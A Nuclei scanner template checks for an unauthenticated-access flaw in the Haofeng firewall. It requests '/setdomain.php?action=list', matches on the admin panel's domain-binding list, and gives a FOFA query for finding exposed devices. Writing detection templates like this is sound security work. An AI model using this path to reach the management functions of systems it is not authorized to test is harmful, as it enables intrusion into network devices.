id: haofeng-firewall-setdomain-unauth

info:
  name: 皓峰防火墙 setdomain.php 越权访问漏洞
  author: xc
  severity: medium
  description: |
    FOFA：app="皓峰防火墙系统登录"

http:
  - method: GET
    path:
      - "{{BaseURL}}/setdomain.php?action=list"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<title>皓峰系统管理平台</title>"
          - "域名绑定列表"
          - "[修改]"
          - "[删除]"
        condition: and
        part: body
